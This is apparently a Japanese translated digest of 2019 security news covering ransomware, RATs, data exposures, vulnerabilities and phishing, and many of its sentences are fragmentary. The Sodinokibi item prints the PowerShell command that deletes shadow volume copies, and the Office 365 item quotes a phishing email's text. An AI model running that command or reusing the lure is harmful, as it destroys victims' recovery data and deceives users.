 この身代金要求型マルウェアは、暗号化されたファイル名に拡張子を付けないので、犠牲者が最初に警告されるのは、以下に示す脅迫文を見た時である。
FortuneCrypt(画像をクリックすると拡大します)
 あなたが、YatronもしくはFortuneCrypt身代金要求型マルウェアに感染させられているのであれば、Kasperskyの復号プログラムを彼らのサイトから直接 もしくは、No More Ransom ダウンロードすることができる
4億の医用放射線画像がインターネット上に晒されている  BleepingComputer : News>Security(2019/09/18) 
 パブリックWebに晒されていた医用画像保管システムの解析は、52カ国のおよそ600のサーバが、不正アクセスに対し全く保護されていなかったことを明らかにした。
多大で気にかかる数字 
 ドイツに本拠を置く脆弱性解析とマネージメント企業であるGreenbone Networksは、パブリック インターネットに接続されている2300のPicture Archiving and Communication System (PACS、【訳注】 正確に定義された日本語はないが「医用画像保管電送システム」と呼ばれる(東海大学大磯病院・医学豆知識より)) システムを検証し、極秘情報の公開という重大な問題を発見した。
・ 姓名
 攻撃者は、最終目標としての金銭の見返りのある、より効果的なソーシャルエンジニアリングとフィッシング攻撃を配備するために、この情報を使用することができる。
 北米で最も懸念される保護されていないPACSは米国である。
 南アメリカでは、ブラジルが突出しており、64万データセット、3110万画像、34のリークサーバが検出されている。
 アジアでは、オープンマシンの最高数はインドだが、トルコはデータレコードの数(490万)と、それに付随する医用画像数(1億7900万)での突出が懸念される。
1万超の同定された脆弱性 
 このレポート は、監査対象のシステムが、1万を超えるセキュリティ問題(20%が緊急度 高 とラベルされている)に直面していることを明らかにしている。
 このような問題の他に、この監視システムは、45のPACSが、DICOMの代わりにHTTPやFTPのような危険なプロトコルを介してデータを提供していたことを発見している。即ち、それらに保管されているデータは、認証なしにアクセスすることができる。
InnfiRATマルウェアはLitecoinとBitcoinのウォレット情報を盗める  BleepingComputer : News>Security(2019/09/14) James_inthe_box によると、2017年11月 に見つけられたが、真面目に解析されたのは、これが最初である。
永続性と分析防止手段 
 このRATは、Sandbox中で稼働していることを発見されると、それ自体を自動的に終了する。そうでなければ、セキュリティ侵害したマシンのHWID(【訳注】 ハードウェアID、Windowsを使用して、INFファイルをデバイスに一致するベンダ定義の識別文字列(Microsoft Docsより))と、国名を収集する。
特定のプロセスをチェックしている(画像をクリックすると拡大します)
暗号化通貨とクッキーを盗む 
 InnfiRATのコマンド・アンド・コントロール(C2)サーバーは、11種類のコマンドを送信することができるが、最も興味を惹くものは、BitcoinとLitecoinのウォレットデータ並びに、偵察段階でKillしたWebブラウザからクッキー情報を検索し盗むものである。
Bitcoinウォレットデータを検索している(画像をクリックすると拡大します)
 2,097,152バイト未満のテキストドキュメントもまた、それらが犠牲者のデスクトップに保存されていた場合には、このマルウェアによって収集され、そのC2サーバに格納されている同じ山のような流出データに対して送信される。
・ SendUrlAndExecute(string URL) - 指定されたURLからファイルをダウンロードし、それを実行する
 このRATをドロップするために使用されたマルウェアサンプルハッシュとドメインとC2サーバを含む痕跡情報(Indicators of compromise、IOC)は、ThreatLabZチームのInnfiRATの書き込み の末尾で得られる。BalkanRATと名付けられ、RATペイロード を使用した金融に関心を持つ脅威の主体によって実行された作戦の一部として幾つかの国々をターゲットにしたものである。LookBackと呼ばれるドキュメント化されていないRAT は、Proofpoint Threat Insight Teamによって発見され、公益事業部門の3つの米国の組織をターゲットにしたスピア-フィッシング(【訳注】 詐欺行為をけしかける対象に合わせて手口をカスタマイズする詐欺(Weblioより))キャンペーンを介し拡散している。
新しいNetCAT攻撃は、IntelのCPUから極秘データをリークすることができる  BleepingComputer : News>Security(2019/09/11) 
 
 DDIOは、Intelのサーバーグレード プロセッサ特有のものであり、2012年以降のIntel Xeon E5, E7, SPファミリーではDefaultでONになっている。
攻撃のトポロジー
 「より正確には、NetCATで、我々は、リモートキャッシュ サイドチャンネルを使用してSSHセッションから個別のネットワークパケットの到着時刻をリークすることができる。」 DDIO中のキー プロパティをリバースエンジニアリングすることで、この研究者は、このキャッシュが共有されている方法を学習した。この知識と、ネットワークカードや他のサーバーサイド周辺機器をスパイすることで、ネットワーク上のクライアントがサーバに接続するために
SSHを使用した時、彼らがCPUキャッシュ中のアクセス時刻を監視することが可能になる。
 「例えば、'a'の直後に's'をタイプすることは、's'をタイプした後に'g'をタイプするより高速である。NetCATは、あなたがプライベートSSHセッション中でタイプしたことをリークするために、キーストローク タイミング攻撃として知られるパケットの到着時間間隔の統計分析を実行することができる。」
 データのタイプを決定するために、研究者は時間をキーストロークにマップするために機械学習(【訳注】 データから反復的に学習を行い、パターンや特徴を見つけ出して未知のデータに対して予測を行う技術(Classmethodより))を始めた。NetCAT: Practical Cache Attacks from the Network "で利用できる。	
VIDEO 
 
 Intelはこの問題を認識しており、この問題は、CVE-2019-11184として追跡される。公開と技術的詳細に関する報奨金が授与された。推奨している 。この警告にも拘わらず、この脆弱性のCVSS基本値は2.6/10と低い値になっている。
数億のFacebookユーザの電話番号がインターネット上に放置されていたことが発見された  Tripwier : The State of Security(2019/09/05) レポート している。
晒されていたデータベースの一部(画像をクリックすると拡大します)
 ハッカーがデータを収集するためにFacebookをセキュリティ侵害したとするものは誰もいない。更に、晒されていたデータベースはFacebook自体によって使用されているサーバ上には発見されていない。しかし、おそらく、このデータは、おそらくFacebookアカウントに接続するアプリケーションを作成したサードパーティーが、数百万のFacebookユーザプロファイルから抽出したものである。このデータスクレイピングは、間違いなく何が発生しているのか認識していないユーザや、許可されていることの意味を理解していないユーザの役に立っていた。
 Facebookのスポークスマンによると、晒されていたデータは、Facebookがユーザの電話番号へのアクセスを制限する前に収集されたものである。
 このデータセットは古いものであり、昨年、我々が、電話番号を使用して誰かが他人を特定する機能を削除するように変更する前に取得された情報のようである。このデータセットは削除された。そして、我々はFacebookアカウントがセキュリティ侵害されたという証拠を何ら確認していない。
 しかしながら、データが初めに数年前に収集されとする発言は的はずれである。人々が数年間同じ電話番号を持ち続けることは珍しいことではない。そして、Facebookのようなオンライン企業が、過去にデータの予防手段が不十分であったのなら、現在及び今後数年、依然として潜在的な問題が存在する。
・ 犯罪者は、あなたがにフィッシングサイトに導いたり、マルウェアにさえ導く不要なメッセージをスパムできる。 
 特定の個人の携帯電話番号の決定が可能なことは、詐欺師やハッカーにとっては情報の貴重な部分である。そして、数百万の携帯番号のデータベースは、明らかに犯罪者の一部にとっては関心事である。Cambridge Analytica の大失敗のような幾つかの事実は、メディア、規制当局、政府中に同様に懸念を引き起こす。これは、最早忘れられているかのような、5億を超えるFacebookのレコードがサードパーティーの開発者のずさんなセキュリティに起因して、インターネット上に晒されたまま (パスワード無し)だった今年初めのインシデントと同じである。未来はプライベートなものになるはずです 」と発言し、Facebookは、よりプライバシーに重点を置くことに全力を捧げると主張した。この声明は、ネットワークの大雑把な歴史を考慮し、
身代金要求型マルウェアSodinokibiは、ハッキングしたサイトのインチキフォーラムを介して拡散している  BleepingComputer : News>Security(2019/09/02) 
インチキのQ&Aを被せる攻撃の動作方法 
 BleepingComputerは、複数の犠牲者がこの方法で感染させられたことを確認したAura によって、この新しい攻撃方法を最初に警告された。以下に、我々は、この攻撃の動作方法と、Sodinokibiもしくは、REvil身代金要求型マルウェアをインストールするプロセスの全般的な概要を提供する。EITest Chrome HoeflerText Font Update攻撃 に似て、この攻撃で利益を上げている者共は、サイトをハッキングし、以下に示すようにJavaScriptをそのHTML中に挿入する。挿入されたURLは、全ての訪問者でアクティベートされるが、初めての訪問者や、そのサイトに一定時間行っていないユーザは、そのデータが含まれるだけである。
被せて挿入されたJavaScript(画像をクリックすると拡大します)
 初めてこのサイトを訪問した時、このスクリプトは、下に示すようにコンテンツの上に被せてインチキのQuestions and Answersフォーラムへの投稿をフランス語で発生させる。
インチキのQuestions and Answers Forumへの投稿(画像をクリックすると拡大します)
 ユーザにとって、このフォーラム投稿の内容は、インチキではあるものの通常のサイトのように見える(上図)が、ハッキングされたページの内容に関連しているものであり、実際にはスクリプトによって作成され被されたものである。
 "Hello, I am looking to download letter of termination contract photocopier model. A friend told me he was on your forum. Can you help me?"
 こんにちは、コピー機契約の終了に関する通知書の雛形をダウンロードしたいと思っている。友人は、あなたのフォーラムにあったと私に告げた。手伝ってもらえますか?
 質問に対する回答で、インチキの回答が、Adminによって提供され、要求されている契約への直リンクが提供される。
 "Here is a direct download link, model letter of termination contract photocopier."
 こちらが、コピー機契約終了の通知書の雛形へのダウンロード直リンクです。
 ユーザが、このリンクをクリックすると、攻撃者の支配下にある任意のハッキングされたサイトから、ZIPファイルがダウンロードされる。この特定の例においては、このファイルは、"modele_de_lettre_de_resiliation_contrat_photocopieur.zip"と名付けられており、解凍すると同じ名前のJScriptファイル が含まれている。
JScriptインストーラ(画像をクリックすると拡大します)
 このJScriptは、リモートサーバに接続する難読化されたコードを含んでいる。そして、このサーバは大量のデータで答えてくるだろう。
キャプション(画像をクリックすると拡大します)
 このデータは、かなり時間がかかるが復号され、%UserProfile%フォルダにGIFファイルとして保存される。このファイルは、多少難読化されたPowerShellコマンドが含まれている。そしてこれは、ReadAllText.Replace関数を使用して、そのファイルから、あらゆる ~ 文字を削除することでクリーンにされる。
PowerShellコマンドから ~ 文字を削除
 これは、結果としてクリーンなPowerShellコマンドになるが、次に、コンピュータを暗号化するためのSodinokibi DLLを実行するために使用される。
難読化を解除されたGIFファイル(画像をクリックすると拡大します)
 暗号化プロセスの間に、この攻撃者は、以下のPowerShellコマンドを使用してシャドーボリュームコピーを除去する。
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
 終了すると、この犠牲者のファイルは暗号化され、脅迫文が、復号プログラムを購入する方法に関する情報を含むTor支払いサイトに犠牲者を導く。
Sodinokibi Tor支払いサイト(画像をクリックすると拡大します)
 このような攻撃から自分自身を保護するには、必ずリアルタイムプロテクション付きの何らかのセキュリティソフトウェアをインストールすることと、末尾に .js 拡張子のある実行ファイルを決して実行しないことである。デモンストレーションビデオ を作成した。
Foxitユーザパスワードの漏洩を含むデータ侵害を公開  BleepingComputer : News>Security(2019/08/30) プレスリリース によると、現在は世界中に5億2500万ユーザを抱えている。
支払い情報は漏洩されていいない 
 Foxitによると、無料のメンバーシップ'My Account'サービスは、その顧客に「使用版ソフトウェアのダウンロード、注文履歴、製品登録情報、トラブルシューティングとサポート情報」を提供している。
 このシステムは、ユーザ名、e-Mailアドレス、企業名、IPアドレス、電話番号は保持しているが、他の個人特定データや支払いカードの情報は保持していない。Foxitは、そのシステムに顧客のクレジットカード情報を保持していない。
 この会社はまた、影響を受ける'My Account'ユーザは、e-Mailを介して、このインシデントに関して警告されたと発言 している。このe-Mailは、現在漏洩しているリスクの全てに関して彼らに通知するものであり、パスワード再設定フォームへのリンクを含んでいる。
Foxitデータ漏洩通知メール
 Foxitはデータ保護当局と法執行機関にこの漏洩を通知した。そして、当局の調査に協力する予定である。
「協調型の身代金要求型マルウェア攻撃」が、テキサス州の23自治体を襲撃  BleepingComputer : News>Security(2019/08/18) 
23は最終的な数字ではない可能性 
 この攻撃は、8月16日の朝に始まった。収集された証拠に基づくと、この攻撃は単一の攻撃者によって実行されているようである。最初のステートメント で、DIRは、攻撃の源の調査は進行中であるが、優先されることは、影響を受けた自治体への対応と復旧を支援することであると発言している。
 「現在、DIR(テキサス州情報資源管理局)とテキサスA&M大学システムのCyberresponse and Security Operations Centerチームは、最も重大な影響を受けている管理区域に要員等を配備している」
 DIRの追加として、テキサス緊急管理部(TDEM)が、州のオペレーションセンターを介して州の機関と連携して、その努力を支援すると通知しているので、影響を受けている自治体からの要求があれば追加の要員等が提供される。KUT(テキサス大学オースティン校) , Austin's NPR Station(【訳注】 NPRはNational Public Radioの略。アメリカ公共ラジオ局と訳される)に告げている。発言 している。
身代金要求型マルウェアは米国において強大である 
 米国において最近、身代金要求型マルウェア事案は増大している。そして、政府の部門がしばしば標的になっている。そして、大変多くの行政機関が身代金の支払いに応じる時、身代金が50万ドル(約5億3000万円)以上なのは常識である。遠隔測定法によるデータ は、世界中の他のどの国よりも米国が身代金要求型マルウェア攻撃の対象(世界中のこの事案の53%に及ぶ)になっていることを明らかにしている。100万ドル を少し超える価値のBitcoinでの支払いを要求し勝ち取っている。学区 )も最近 、身代金要求型マルウェアによって攻撃されている。リンクの地図 は、米国の医療、教育、政府組織に影響を与えたファイル暗号化事案を示している。
Windows 10 1903ユーザが、KB4512508をインストールするとエラーが発生するとレポートしている  BleepingComputer : News>Security(2019/08/15) 
Windows Update KB4512508
 このアップデートをインストールしている時、ユーザは、インストール100%のマークを得るが、次に、エラーコードが表示されると報告(1 , 2 , 3 , 4 )している。
・ 0x800f0982 - このエラーコードは、「デバイスにアジア系言語パックがインストールされている」時に、今までのWindows 10のアップデートで表示される(1 , 2 )発生する可能性 がある。複数のダウンロードステップを要求 し、それらのステップの一つが失敗した時に表示される。 あなたは、アップデートが中断したところから、このアップデートを継続できるか否か確認するために再起動するか、もう一度やり直すこともできる。
 
 現時点で、Microsoftはこの問題を認識していない。ユーザに残されている道は、自分自身でこの問題を解決するか、公式の対応が与えられるまでアップデートのインストールを遅らせるかの何れかである。KB4508433 が、インストールされているか否かチェックしたいかもしれない。このSSUアップデートは、Windows Updateがインストールに失敗することを防ぐために既知のバグを解決するように設計されている。
Windows 10セキュリティ警告: 40を超えるドライバ中に脆弱性が発見された  BleepingComputer : News>Security(2019/08/10) 
ドライバは信頼されている 
 ファームウェアとハードウェアのセキュリティ企業Eclypsiumの研究者達は、ユーザ空間からカーネルパーミッションに特権を昇格するために悪用される可能性のある40を超えるドライバを発見した。
ソース: Linagora Engineering
 Windowsにドライバをインストールするには、管理者権限が要求され、Microsoftによって認証された信頼される企業からである必要がある。このコードはまた、信頼性を証明するために正当な認証機関によって署名されたものでもある。署名が欠けていると、Windowsはユーザに警告を発生する。
 「この問題は、Microsoft Windowsの全ての最先端のバージョンに適用され、Windowsマシンを、これら既知の不良ドライバの一つをロードしないようにするための普遍的なメカニズムは現在存在していない。」
 この研究者達は、脆弱性のあるドライバの中に、グラフィックカード、ネットワークアダプタ、ハードドライブ、その他のデバイスと相互作用するドライバを発見したと発言している。
リスクは仮説ではない 
 これらのコンポーネントに植え付けられたマルウェアは、「格納されたり、表示されたデータを読み込み、書き込み、リダイレクトすることや、ネットワーク越しに送信することが可能である。」 更に、このコンポーネントは、システムでサービスの拒否状態(denial-of-service)を引き起こすために無効化することができる。古い脆弱性のあるドライバ を使用した。APT28(別名: Sednit, Fancy Bear, Strontium Sofacy)のLojaxルートキットは、署名されたドライバを介してUEFIファームウェア中に格納されたため、より狡猾なものであった。
American Megatrends International (AMI)
韓国の100万を超えるペイメント・カードの詳細がダークWebで売られていた  BleepingComputer : News>Security(2019/08/03) 
韓国のカード記録の猛烈な増加 
 6月、研究者達は、5月に確認されていた42,000から尋常でない増加をし、230,000レコードが売られていることに気づいた。そして、これは通常観測された量と一致していた。次の月には、レコード数は890,000以上にまで増加していた。
100万を超えるカード提示取引レコード(画像をクリックすると拡大します)
需要は価格を粗2倍にしている 
 韓国の支払い記録は、犯罪者達が利用できる多大な供給を持っていたため、昨年度の需要は低調であったと、サイバー犯罪フォーラムでカード関連行動を監視しているGemini Advisoryの研究者達は発言している。2019年、これは、供給は同じで、需要は増加に変化した。
米国のカード所有者も影響を受けている 
 この研究者達からの別の観測として、セキュリティ侵害された韓国の記録の3.7%は、アメリカで発行されたカードであった。
 「最も影響を受けている米国の金融機関の一つは、アメリカ空軍に奉仕している信用組合である。空軍は韓国に複数の空軍基地を維持している」と、Gemini Advisoryは発言している。
 セキュリティ侵害されたデータを注視してみると、カードの多くは韓国を訪問したことのある米国の所有者に属していることが明らかになった。
セキュリティ侵害されたカードの国別TOP 5(注:日本も存在しています)
 カード提示取引から支払いデータの詳細を盗むことは、一般にPoSデバイスに接続しているシステム上にマルウェアを植え付けることで実行される。多くの重大事案において、攻撃ベクトルは、Defaultもしくは推測が容易なパスワードで保護されているリモートデスクトップ接続であった。
WeTransferにセキュリティ上の重大事案: 別人にファイルを送信  BleepingComputer : News>Security(2019/06/21) 1 , 2 , 3 ]を受け取り始めた。
WeTransferユーザに送信されたe-Mail(画像をクリックすると拡大します)
 このe-Mailの完全版は以下である。
WeTransferユーザー諸氏
 セキュリティ上の問題に関して、WeTransferサービスのe-Mailが別人に送信されていたことをお知らせします。 これは6月16日と17日に発生しました。 我々のチームは、この状況を修正して封じ込め、それがどのように起こったのかを発見するために精力的に作業してきました。
 送信または受信した転送が一部の人にも配信されていることがわかりました。 我々の記録では、これらのファイルが、アクセスされたことが示されていますが、その殆どは意図されている受信者によってアクセスされています。 それにもかかわらず、予防措置として、これ以上のダウンロードを防ぐためにリンクをブロックしました。
 あなたのe-Mailアドレスは転送されたe-Mailにも含まれているので、あなたが受け取る疑わしい、もしくは、通常ではないe-Mailに注意してください。
私達は、あなたのデータがいかに重要であるかを理解しています。当然のことですが、私たちのサービスに対するあなた方の信頼を決して無駄にしません。 質問や懸念がある場合は、このe-Mailに返信し、サポートチームに連絡してください。
WeTransfer Team
 WebTransferは、彼らのWebサイトで、アカウントの一部はログアウトされ、パスワードはアカウントを保護するためにリセットされた。そして、この重大事案に巻き込まれたTransferリンクへのアクセスはブロックされているとするセキュリティ通知 をポストしている。
同梱されているシステム健全性ソフトウェアのフローにより、数百万のDell PCに攻撃に対する脆弱性  Bitdefender : Hot For Security(2019/06/22) DellのWebサイト上で公開されたサポート アドバイザリ によると、Dellは、この問題がサードパーティーのコンポーネントであるSupportAssist(DellのホームユーザとビジネスPCに同梱されているトラブルシューティング ソフトウェア)中にあると明らかにしている。このソフトウェアは、Dellが「業界初の自動化された予防的および予測的サポート技術」と説明しているソフトウェアである。宣伝資料 で、DellはSupportAssistが「あなたのシステムのハードウェアとソフトウェアの健全性を予防的にチェックする」と主張している。問題が検出されると、必須のシステム状態情報が、トラブルシューティングを開始するためにDellに送られる。Dellは、コストのかかる問題にならないように対話で解決するために、あなたに接触してくる。」発見した 。このDLLハイジャックの脆弱性は、攻撃の間に、システムレベル権限を取得される可能性がある
PC-Doctor Toolbox for Windows
 この問題の大きさは、Dellの顧客以上に広がるだろう。PC Doctorは、そのWebサイトで以下のように述べている 。「大手コンピュータメーカーは、世界中のコンピュータシステムに一億を超えるWindows用PC Doctorをプレインストールしている。」
GandCrab 5.2復号ツールのリリースは、邪悪な身代金要求型マルウェア物語を終わらせる  BleepingComputer : News>Security(2019/06/17) 欧州刑事警察機構 のアナウンスによると、GandCrab身代金要求型マルウェア用の復号ツールは、この身代金要求型マルウェアの最新版を復号する。
 「このツールは、オーストリア (Bundeskriminalambt-BMI), ベルギー (Federal Computer Crime Unit), ブルガリア (Bulgarian Cybercrime Unit), フランス (Police Judiciaire de Paris-Befti), ドイツ (LKA Baden-Wurttemberg), オランダ (High Tech Crime Unit), ルーマニア (DIICOT), イギリス (NCA and Metropolitan Police), 米国 (FBI), 欧州刑事警察機構の法執行機関と民間のBitdefenderとの協働でリリースされた。」
 Bitdefenderによる今迄のGandCrab身代金要求型マルウェア用の復号ツールと類似して、このツールは暗号化アルゴリズム中の欠陥に起因して可能にするものではない。代わりに、法執行機関と協働 したこのセキュリティ企業は、犠牲者のファイルを復号するために必要な復号キーをダウンロードするためにGandCrabのコマンド&コントロールサーバーへのアクセスを取得する。この記事 、もしくは、我々のGandCrab Support and Helpフォーラムのトピック にコメントを残しなさい。
GrandCrabの盛衰 
 BleepingComputerは、GandCrabがExploit.inのようなハッカーフォーラムでアフィリエイトとしての身代金要求型マルウェア(Ransomware-as-an-Affiliate)システムを介して拡散し始めた2018年1月28日の最初のリリース 以来、ずっとGrandCrabを追い続けてきた。
当初のGandCrab脅迫文(画像をクリックすると拡大します)
 GandCrabの開発者達は、身代金要求型マルウェアを監視している研究者や組織を愚弄する傾向を持っていた、そして、最初のリリースも違いはなかった。
bleepingcomputer.bit
 それ以来、我々は、彼らの最終リリースバージョン5.2まで、GandCrabチームがリリースする複数のバージョンを追跡してきた。
GandCrab 5.2脅迫文(画像をクリックすると拡大します)
 GandCrabチームは、コマンド&コントロールサーバがハッキングされたり、研究者が復号ツール[1 , 2 , 3 ]をリリースしたりと幾つかの障害にぶつかったが、彼らが今月撤退をアナウンスした時、巨大な収益を上げたと主張している。20億ドル(約2155億円)稼ぎ 、個人あたりの収益は1億5000万ドル(約162億円)だと主張している。
GandCrab撤退報告(画像をクリックすると拡大します)
 この復号プログラムのアップデート版のリリースで、GandCrab身代金要求型マルウェアの寿命は、公式に終焉し、ユーザは現在、無料で彼らのファイルを取り戻すことができる。
GrandCrabで暗号化されたファイルを復号する方法 
 GandCrab身代金要求型マルウェアの v1, v2, 5-5,2に感染しているのであれば、あなたは、Bitdefenderによってアップデートされた復号プログラムを使用して無料でファイルを取り戻すことができる。
BDGandCrabDecryptTool.exeファイルのダウンロード 
 ダウンロードしたら、このプログラムをダブルクリックすると、使用許諾書が表示されるので、これを受け入れる。
インターネット接続を必要とするメッセージ
 これで、メインのGandCrab復号プログラムの画面が表示される。この時点で、あなたはコンピュータ全体を復号するのか、それとも特定のフォルダを復号するのかのオプションを持つことになる。
BitdefenderのGandCrab復号プログラム(画像をクリックすると拡大します)
 私は、このプログラムが間違いなく動作することを確認するために、最初にこの復号プログラムでファイルを復号テストするように提案する。きちんと動作したら、コンピュータ全体を復号するために"Scan entire system"を選択しなさい。
復号キーを取得中(画像をクリックすると拡大します)
 復号キーが取得されロードされると、この復号プログラムは、あなたのコンピュータ上のファイルの復号を開始する。あなたは、この復号プログラムのスクロールバーを使用して進捗状況を追跡することができる。
GandCrabで暗号化されたファイルを復号中(画像をクリックすると拡大します)
 終了すると、この復号プログラムは、終了を宣言し、何らかの問題があることをあなたに警告する。
終了した復号プログラム(画像をクリックすると拡大します)
 例えば、我々の例では、この復号プログラムは、10ファイルを除く全てのファイルを復号した。幸いなことに、これらのファイルは、アプリケーションを再インストールすることで再作成されたアプリケーション特定のファイルであった。此処 、もしくは、我々のGandCrab Support and Helpフォーラムトピック の60ページに、気兼ねせずコメントを残しなさい。
新しいWSH RATマルウェアは銀行の顧客をキーロガーで狙っている  BleepingComputer : News>Security(2019/06/14) Houdini Worm  (H-Worm)の亜種である。
「機能」が満載されたWHS RAT 
 この新しいRATを発見した一つであるCofenseの研究チームは「WSHは、おそらくWindowsマシンでスクリプトを実行するために使用されるアプリケーションである正当なWindows Script Hostを参照している」と発言している。
フィッシングe-Mailのサンプル
 このRATは、バイヤーが、彼らの標的のコンピュータを遠隔からコントロールする、ファイルをアップロード・ダウンロード・実行する、並びに、リモートスクリプトとコマンドを実行するために、犠牲者のWebブラウザやe-Mailクライアントからパスワードを盗む攻撃能力を発動することを可能にしている。
WSH RATサブスクリプション情報
WHS RATフィッシングキャンペーン 
 最初に説明したように、WHS RATの悪意あるe-Mail添付ファイル(URL、ZIP、MHTフォーマット)を配布するフィッシング攻撃は、RATペイロード(【訳註】悪意の総量の意味)を含むZIPaアーカイブをダウンロードさせるために市中銀行の顧客をリダイレクトすることによって積極的に彼らを狙っている。
第二ステージの悪意あるペイロードのダウンロード(画像をクリックすると拡大します)
 三つの悪意あるツールは、キーロガー、メール認証情報ビューアー、ブラウザ認証情報ビューアーであり、何れも、サードパーティーによって開発され、認証情報と他の重要な情報を収集するために、このキャンペーンのオペレータが使用している。WSH RATレポート の末尾に提供されている。 
Evernoteアドオンの緊急のフローは数百万の重要なデータを漏洩させる  BleepingComputer : News>Security(2019/06/12) 
ユニバーサル・クロスサイトスクリプティング・フロー 
 このセキュリティ問題は、CVE-2019-12592 として追跡されるユニバーサル・クロスサイトスクリプティング(UXXS、別名 Universal XSS)であり、「Webブラウザの同一生成元ポリシーをバイパスし、攻撃者にEvernoteドメイン外からIframe中でのコード実行権限を承認する」Evernote Web Clipperのロジカル・コーディング・エラーから発生しているものである。サイト分離 セキュリティ機能が無効にされると、他のWebサイトのアカウントからのユーザデータは最早保護されず、悪意ある行動主体はサードバーティーのサイトから「認証、金融、ソーシャルメディアでの個人的な会話、個人のe-Mail等を含む」重要なユーザ情報にアクセスすることを可能にする。
このフローへの攻撃
 これは、ターゲットを、標的にされているサードパーティのWebサイト付きの非表示のiframeをロードし、ロードする全てのiframeに悪意あるペイロード(「クッキー、証明書、個人情報を盗み、ユーザとしての行動を実行する」)を挿入することをEvernoteに強いるように設計された攻撃の引き金になるハッカーがコントロールしているWebサイトにリダイレクトすることによって実行される。Evernote Web Clipper  Chrome拡張を使用して、あらゆる人のソーシャルメディア、財務情報、ショッピングデータ、プライベートなメッセージ、認証データ、e-Mailへのアクセスを取得する方法をデモするCVE-2019-12592フロー用の実用的な概念の照明(PoC)を設計している 。
VIDEO 
Evernote Web Clipper UXSS脆弱性は既に修正されている 
 Evernoteは、5月27日のGuardioの責任ある公開報告を受けた週にこの脆弱性を完全にパッチし、5月31日全てのユーザに対してこの修正を公開した。6月4日、このパッチは完全に機能することが確認されている。EvernoteのWeb Clipper Chrome拡張のパッチされたバージョンを使用しているか否か確認するには、Evernote Chrome拡張のページ(chrome://extensions/?id=pioclpoplcdbaefihamjohnefbikjilc)に進み、バージョン7.11.1以降がインストールされていることをチェックしなさい。発言している 。撤回しなければならなかった 。4月中旬 、Evernoteは、攻撃者がローカルに格納されたアプリケーションや標的にしているMac上のファイルを遠隔から実行することを可能にするパストラバーサル脆弱性(【訳註】WebアプリケーションのURLやそのパラメータに特定の文字列を与えることで、非公開のディレクトリやファイルにアクセスできてしまう脆弱性(security.c-inf.comより))を修正している。
Windows 10アプリケーションが、Adブロッカーが絶対に止めることができない悪意ある広告に襲われている  BleepingComputer : News>Security(2019/06/03) 
Microsoft NewsとMicrosoft Jigsawのドイツ語広告(画像をクリックすると拡大されます)
 週末に渡り、突然技術サポートスカム、富くじ、アンケート調査詐欺、商品ルーレットでの当選を押し付けてくるサイトを開いたとするドイツのWindows 10ユーザからの多くのレポート[1 , 2 , 3 ]があった。このような広告は、彼らがMicrosoft News, Microsoft Jigsaw, 他のMicrosoft Advertisingをサポートしているアプリケーションのようなアプリケーションを使用している間に突然開いている。
悪意ある広告キャンペーンで表示される技術サポートスカム(画像をクリックすると拡大されます)
 これらの広告は、新しいウィンドウで自動的にスカムサイトを起動するためのJavaScriptを使用するMicrosoft Advertisingネットワークで広告キャンペーンを購入したスカマーによって発生させられている。これらの広告は広告サポートアプリケーション中に表示される時に、Windows 10は、代わりにDefaultブラウザに新しいページを起動する。フランスのユーザをターゲットにした類似の悪意ある広告キャンペーン 同様に、このドイツでのキャンペーンは、レジデンシャルIPアドレス上のユーザのみをターゲットにしているようである。例えば、ドイツのIPアドレスへのアクセスを取得するためにVPNを使用しているなら、この悪意ある広告は表示されない。
Adブロッカーは役に立たない 
 これらの広告は広告サポートアプリケーションのために表示されているので、あなたのブラウザにインストールされている如何なるAdブロッカーも、このページの読み込みを防ぐことはない。
悪意あるWebサイトをブロックしているESET
 他のオプションは、既知の広告ネットワークと悪意あるサイトへの接続を全てブロックするHOSTSファイル をインストールすることである。
Windows 10タスクスケジューラ中の0-Dayフロー用のマイクロパッチがリリースされた  BleepingComputer : News>Security(2019/05/31) エクスプロイトコード は、研究者SandboxEscaper(彼女が10日前に公開した時BearLPEと名付けていた)から入手でき、Windows 10のタスクスケジューラ コンポーネントをターゲットにしている。0patch の共同設立者Mitja Kolsekは、古いシステムから最新のシステムに追加することが可能な、タスクファイルのレガシー(【訳註】新しいものにとって代わられたものを指す言葉)サポートから生じていると説明している。
 以下のビデオは、脆弱性のあるシステムで、このマイクロパッチが動作する方法をデモしている。
VIDEO  
 「Windows XP schtasks.exeをWindows 10で実行すると、レガシーRPC関数(Remote Procedure Call。「関数呼び出し」をローカルではなく別の環境に接続して代わりに実行しようというもの(Quiitaより))がコールされる。これは順番に、SchRpcSetSecurityのような現在の関数をコールすることになる」とKolsekは発言している。
 この欠陥は何か? 既にSandboxEscaperや他の研究者によって疑われているように、これは不正な成り済ましのケースであるが、ひねりが加えられている。最初に問題の原因と考えられていたSchRpcSetSecurityメソッドは、正確に呼び出し元を偽装して、正確に実行している。
。
 彼は続けて、「taskcomp.dllスレッド中のコードは、Local Systemとして実行され、呼び出し元は攻撃者である。しかし、このコードがSchRpcSetSecurityを呼び出す前では、呼び出し元は偽装されていない。SeRestorePrivilege特権を有効にする(ファイルパーミッションを変更する必要がある)ために『自身』を偽装している。」マイクロパッチ は、メモリ内で修正命令を実行し、通常ユーザがシステムファイルに持っているパーミッションのセットの変更を妨げる。
画像をクリックすると拡大されます
 既存の0patchユーザーは全員、既に修正プログラムを持っており、自分のマシン上で実行している。マイクロパッチを取得するには、アカウントを作成し、0patchエージェントをインストールする必要がある。
Flipboadユーザのe-Mailアドレスとハッシュ化パスワードが盗まれた  Graham Cluley : News(2019/05/29) 通知 を発表した。
 明らかに、インターネット上の他の場所で侵害されたパスワードを使用していないことを確認することはユーザにとって理にかなったことである。このサイト上で始終論議しているように、異なる場所で同じパスワードを決して使用してはならない。あなたの貧弱な人間の脳が、異なる場所での多くの一意で複雑なパスワードを思い出すことができないのであれば、あなたは私と同じ状況にある。代わりに適切なパスワードマネージャを使用しなさい。
 ユーザが、2012年3月14日以降パスワードを作成もしくは変更している場合、bcryptと呼ばれる関数でハッシュ化されている。ユーザがその時点以降パスワードを変更していない場合は、SHA-1でソルト付きハッシュ化されている。
 率直に言って、Flipboardが、2012年により強力なハッシュアルゴリズムを導入した時点で、ユーザーにパスワードの再設定を強制することが適切な考えだったかもしれない。
フィッシングe-Mailは、Office365の「ファイル削除」警告を装っている  BleepingComputer : News>Security(2019/05/28) 
Office 365フィッシングメール(画像をクリックすると拡大されます)
 このフィッシングスカムの本文は以下である。
A medium-severity alert has been triggered
Unusual volume of file deletion
Severity: Medium
Time: 05/26/2019 07:36:39 pm (UTC)
Activity: FileDeleted
Details: 15 matched activities in 5 minutes.
View alert details
Thank you, 
The Office 365 Team
